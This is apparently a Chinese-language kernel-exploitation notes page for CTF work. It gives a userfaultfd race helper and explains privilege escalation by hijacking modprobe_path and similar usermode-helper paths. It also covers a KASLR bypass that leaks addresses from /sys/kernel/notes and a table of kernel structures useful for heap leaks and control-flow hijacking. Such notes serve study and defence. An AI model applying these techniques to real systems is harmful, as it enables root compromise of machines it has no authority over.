1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 static pthread_t monitor_thread;void errExit (char * msg) { printf ("[x] Error at: %s\n" , msg); exit (EXIT_FAILURE); } void registerUserFaultFd (void * addr, unsigned long len, void (*handler)(void *)) { long uffd; struct uffdio_api uffdio_api ; struct uffdio_register uffdio_register ; int s; uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1 ) errExit("userfaultfd" ); uffdio_api.api = UFFD_API; uffdio_api.features = 0 ; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1 ) errExit("ioctl-UFFDIO_API" ); uffdio_register.range.start = (unsigned long ) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1 ) errExit("ioctl-UFFDIO_REGISTER" ); s = pthread_create(&monitor_thread, NULL , handler, (void *) uffd); if (s != 0 ) errExit("pthread_create" ); }
在使用时直接调用即可:
1 registerUserFaultFd(addr, len, handler);
需要注意的是 handler 的写法,这里直接照抄 Linux man page 改了改,可以根据个人需求进行个性化改动:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 static char *page = NULL ; static long page_size;static void *fault_handler_thread (void *arg) { static struct uffd_msg msg ; static int fault_cnt = 0 ; long uffd; struct uffdio_copy uffdio_copy ; ssize_t nread; uffd = (long ) arg; for (;;) { struct pollfd pollfd ; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1 , -1 ); if (nready == -1 ) errExit("poll" ); nread = read(uffd, &msg, sizeof (msg)); if (nread == 0 ) errExit("EOF on userfaultfd!\n" ); if (nread == -1 ) errExit("read" ); if (msg.event != UFFD_EVENT_PAGEFAULT) errExit("Unexpected event on userfaultfd\n" ); uffdio_copy.src = (unsigned long ) page; uffdio_copy.dst = (unsigned long ) msg.arg.pagefault.address & ~(page_size - 1 ); uffdio_copy.len = page_size; uffdio_copy.mode = 0 ; uffdio_copy.copy = 0 ; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1 ) errExit("ioctl-UFFDIO_COPY" ); } }
setxattr + userfaultfd FUSE race punch hole 利用思路 exp Kernel Trick 修改符号链接
与modprobe_path类似,还有core_pattern,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 static void validate_coredump_safety (void ) { #ifdef CONFIG_COREDUMP if (suid_dumpable == SUID_DUMP_ROOT && core_pattern[0 ] != '/' && core_pattern[0 ] != '|' ) { printk(KERN_WARNING "Unsafe core_pattern used with fs.suid_dumpable=2.\n" "Pipe handler or fully qualified core dump path required.\n" "Set kernel.core_pattern before fs.suid_dumpable.\n" ); } #endif }
poweroff_cmd,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 poweroff_work_func () { char v0; __int64 result; _fentry__(); v0 = poweroff_force; result = run_cmd(poweroff_cmd); if ( (_DWORD)result ) { if ( v0 ) { printk(&unk_FFFFFFFF81CB2888); emergency_sync(); return kernel_power_off(); } } return result; }
uevent_helper,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 __int64 uevent_helper_store () { __int64 v0; __int64 v1; __int64 v2; __int64 v3; _fentry__(); if ( (unsigned __int64)(v1 + 1 ) > 0x100 ) return -2LL ; v2 = v1; v3 = memcpy (uevent_helper, v0, v1); uevent_helper[v2] = 0 ; if ( !v2 || *(_BYTE *)(v3 + v2 - 1 ) != 10 ) return v2; *(_BYTE *)(v3 + v2 - 1 ) = 0 ; return v2; }
等也可以被修改。
当CONFIG_STATIC_USERMODEHELPER_PATH="y"被设置后,无法使用这些方法。
当能够任意地址分配的时候,与 glibc 改 hook 类似,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
1 2 3 4 5 6 7 8 9 entry_SYSCALL_64() sys_execve() do_execve() do_execveat_common() bprm_execve() exec_binprm() search_binary_handler() __request_module() call_modprobe()
其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static int call_modprobe (char *module_name, int wait) { argv[0 ] = modprobe_path; argv[1 ] = "-q" ; argv[2 ] = "--" ; argv[3 ] = module_name; argv[4 ] = NULL ; info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL , free_modprobe_argv, NULL ); if (!info) goto free_module_name; return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 __int64 _request_module( char a1, __int64 a2, double a3, double a4, double a5, double a6, double a7, double a8, double a9, double a10, ...) { ...... if ( v19 ) { ...... v21 = call_usermodehelper_setup( (__int64)&byte_FFFFFFFF82444700, (__int64)v18, (__int64)&off_FFFFFFFF82444620, 3264 , 0LL , (__int64)free_modprobe_argv, 0LL ); ...... } .data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r .data:FFFFFFFF82444700 db 2F h ; / ; __request_module+14B ↑o ... .data:FFFFFFFF82444701 db 73 h ; s .data:FFFFFFFF82444702 db 62 h ; b .data:FFFFFFFF82444703 db 69 h ; i .data:FFFFFFFF82444704 db 6 Eh ; n .data:FFFFFFFF82444705 db 2F h ; / .data:FFFFFFFF82444706 db 6 Dh ; m .data:FFFFFFFF82444707 db 6F h ; o .data:FFFFFFFF82444708 db 64 h ; d .data:FFFFFFFF82444709 db 70 h ; p .data:FFFFFFFF8244470A db 72 h ; r .data:FFFFFFFF8244470B db 6F h ; o .data:FFFFFFFF8244470C db 62 h ; b .data:FFFFFFFF8244470D db 65 h ; e .data:FFFFFFFF8244470E db 0
从内存搜索 flag 从 /sys/kernel/notes 泄露内核地址 /sys/kernel/notes 的内容是当前运行的 vmlinux 镜像的 .notes 节,里面存有内核函数 hypercall_page 的地址。此信息可用于绕过 KASLR 保护。
对于 OLK-6.6 的 x86 内核,若编译时开启了 CONFIG_XEN 选项,则 arch/x86/xen/xen-head.S 会将汇编函数 hypercall_page 加入到 vmlinux 镜像的 .note.Xen 节:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #ifdef CONFIG_XEN SYM_CODE_START(hypercall_page) ... SYM_CODE_END(hypercall_page) ELFNOTE(Xen, XEN_ELFNOTE_HYPERCALL_PAGE, _ASM_PTR hypercall_page) #endif
链接脚本 arch/x86/kernel/vmlinux.lds.S 中指出,vmlinux 的 .notes 节由各链接文件的 .note.* 节组合形成:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 SECTIONS { .text : ... { ... } RO_DATA(PAGE_SIZE) --(expand)--> NOTES --(expand)--> .notes : ... { BOUNDED_SECTION_BY(.note.*, _notes) } .data : ... { ... } }
在链接生成可执行的 vmlinux 时,arch/x86/Makefile 指定了链接器选项 --emit-relocs:
1 2 3 4 5 ifdef CONFIG_X86_NEED_RELOCSLDFLAGS_vmlinux := --emit-relocs --discard-none else LDFLAGS_vmlinux := endif
该选项为 vmlinux 中所有涉及重定位(Relocation) 的节生成对应的 .rela.* 节。由于 .notes 节带有 hypercall_page,而后者是一个全局符号涉及重定位,因此会生成 .rela.notes 节。注意 rela.notes 的 .info 字段(即下方的 Inf)的值为 22,为 .notes 的序号。
1 2 3 4 5 $ readelf -SW vmlinux [Nr] Name Type Address Off Size ES Flg Lk Inf Al ... [22] .notes NOTE ffffffff8255a2fc 175a2fc 0000f0 00 A 0 0 4 [23] .rela.notes RELA 0000000000000000 18571990 000018 18 I 81 22 8
“链接后”阶段
vmlinux 完成链接并生成后,arch/x86/Makefile.postlink 会被触发。此文件的开头注释解释了这一阶段(Pass) 的工作:
Separate relocations from vmlinux into vmlinux.relocs.
Strip relocations from vmlinux.
具体体现为该文件中 $(call cmd,relocs) 和 $(call cmd,strip_relocs) 两个过程:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 CMD_RELOCS = arch/x86/tools/relocs OUT_RELOCS = arch/x86/boot/compressed quiet_cmd_relocs = RELOCS $(OUT_RELOCS) /$@ .relocs cmd_relocs = \ mkdir -p $(OUT_RELOCS) ; \ $(CMD_RELOCS) $@ > $(OUT_RELOCS) /$@ .relocs; \ $(CMD_RELOCS) --abs-relocs $@ quiet_cmd_strip_relocs = RSTRIP $@ cmd_strip_relocs = \ $(OBJCOPY) --remove-section='.rel.*' --remove-section='.rel__*' \ --remove-section='.rela.*' --remove-section='.rela__*' $@ vmlinux: FORCE @true ifeq ($(CONFIG_X86_NEED_RELOCS) ,y) $(call cmd,relocs) $(call cmd,strip_relocs) endif
重点关注 relocs 过程,将 cmd_relocs 中的 Makefile 语句展开后得到如下 Bash 命令:
1 2 3 mkdir -p arch /x86/boot/compressedarch /x86/tools/relocs vmlinux > arch /x86/boot/compressed/vmlinux.relocsarch /x86/tools/relocs --abs-relocs vmlinux
通过解读 arch/x86/tools/relocs 工具的源码,其实质是按照 ELF 格式解析 vmlinux,通过节头表(Section Header)遍历所有的节,找到其中的 .rela 节并从 r_offset 中获取所有需要被重定位修改的代码地址 ,将这些地址罗列成一个列表 relocs64,并最终将其输出形成 vmlinux.relocs。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 static int do_reloc64 (..., Elf_Rel *rel, ...) { unsigned r_type = ELF64_R_TYPE(rel->r_info); ElfW(Addr) offset = rel->r_offset; switch (r_type) { case R_X86_64_64: add_reloc(&relocs64, offset); break ; } } static void emit_relocs (int as_text, int use_real_mode) { do_reloc = do_reloc64; walk_relocs(do_reloc); sort_relocs(&relocs64); for (i = 0 ; i < relocs64.count; i++) write_reloc(relocs64.offset[i], stdout ); }
随后,根据 arch/x86/boot/compressed/Makefile,将 vmlinux.bin 与 vmlinux.relocs 前后拼接在一起形成 vmlinux.bin.all,并最终经过压缩形成内核镜像产物。
1 2 3 4 5 6 vmlinux.bin.all-y := $(obj) /vmlinux.bin vmlinux.bin.all-$(CONFIG_X86_NEED_RELOCS) += $(obj) /vmlinux.relocs
实践验证方式
可以通过编译一个简单的 C 程序,来了解重定位节的内容。
1 2 3 4 5 6 7 8 9 10 echo "int main() { return 0; }" | gcc -x c - -Wl,--emit-relocs -greadelf -r ./a.out
内核启动阶段
在完成建立早期页表、进入 64 位模式等一系列工作后,执行流转入内核镜像自带的解压器,开始执行解压内核的工作,即 arch/x86/boot/compressed/misc.c 中的 extract_kernel()。此过程涉及内核地址随机化(KASLR):
1 2 3 4 5 6 7 8 9 10 11 12 extract_kernel() choose_random_location(input_data, input_len, &output, ..., &virt_addr) random_addr = find_random_phys_addr(min_addr, output_size); *output = random_addr; random_addr = find_random_virt_addr(LOAD_PHYSICAL_ADDR, output_size); *virt_addr = random_addr; entry_offset = decompress_kernel(outbuf:output, virt_addr, ...) __decompress(input_data, input_len, ..., outbuf, output_len, ...) handle_relocations(outbuf, output_len, virt_addr)
KASLR 的本质是整体内核镜像的随机偏移。可以看到,choose_random_location() 选定的物理地址空间偏移量和虚拟地址空间偏移量分别体现在 output 和 virt_addr 两个地址上。__decompress() 将内核解压缩至 output 地址,此时 output 上承载的就是上文提到的 vmlinux.bin.all。随后 handle_relocations() 开始解析 vmlinux.bin.all,从中找到 vmlinux.relocs,并结合这些重定向信息以及随机偏移,对内核镜像中各个需要重定位的位置实施修改。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 void handle_relocations (void *output, unsigned long output_len, unsigned long virt_addr) { ... for (reloc = output + output_len - sizeof (*reloc); *reloc; reloc--) { ... } #ifdef CONFIG_X86_64 while (*--reloc) { ... } for (reloc--; *reloc; reloc--) { ... } #endif }
注意:此刻解压缩器应该已经在使用虚拟地址,并且(早期)页表已有建立,但这个页表应该实现的是 VA-PA 完全一致的映射,即 VA 的值完全等于 PA。而 .rela.* 节中记录的是内核加载的虚拟地址。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 SECTIONS { . = __START_KERNEL; .text : ... { ... } ... } #define LOAD_PHYSICAL_ADDR ((CONFIG_PHYSICAL_START ... #define __START_KERNEL (__START_KERNEL_map + LOAD_PHYSICAL_ADDR) #define __START_KERNEL_map _AC(0xffffffff80000000, UL)
因此有了 map 这个变量,作用于 extended 上。这个 extended 是(由 .rela.* 记录的)内核镜像中引用了某个全局符号的位置,本应属于内核编译时地址 ,但由于有链接器脚本,该地址等价于内核加载虚拟地址 。由于此刻正在(通过 self map)使用物理地址,因此通过 map 将其转变为带偏移的内核加载物理地址 。
最后再对这些内核镜像位置实施修改,添加运行时虚拟地址 的随机偏移量。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 void handle_relocations (void *output, unsigned long output_len, unsigned long virt_addr) { unsigned long delta, map , ptr; unsigned long min_addr = (unsigned long )output; delta = min_addr - LOAD_PHYSICAL_ADDR; map = delta - __START_KERNEL_map; if (IS_ENABLED(CONFIG_X86_64)) delta = virt_addr - LOAD_PHYSICAL_ADDR; ... for (reloc--; *reloc; reloc--) { long extended = *reloc; extended += map ; ptr = (unsigned long )extended; if (ptr < min_addr || ptr > max_addr) error("64-bit relocation outside of kernel!\n" ); *(uint64_t *)ptr += delta; } }
常见结构体的利用
结构体/能力
控制流劫持
泄露堆
泄露栈
泄露内核地址
结构体大小
cred
×
√
×
×
0xa8 (kmalloc-192)
tty_struct
√
√
×
√
0x2e0 (kmalloc-1024)
seq_operations
√
×
×
√
0x20 (kmalloc-32)
subprocess_info
√
√
×
√
0x60 (kmalloc-128)
pipe_buffer
√
×
×
√
0x280 (kmalloc-1024)
shm_file_data
×
√
×
√
0x20 (kmalloc-32)
msg_msg
×
√
×
x
0x31~0x1000 (>= kmalloc-64)
timerfd_ctx
×
√
×
√
0xf0 (kmalloc-256)
system V 消息队列 pipe 管道相关 io_uring 与异步 IO 相关 msg_msg poll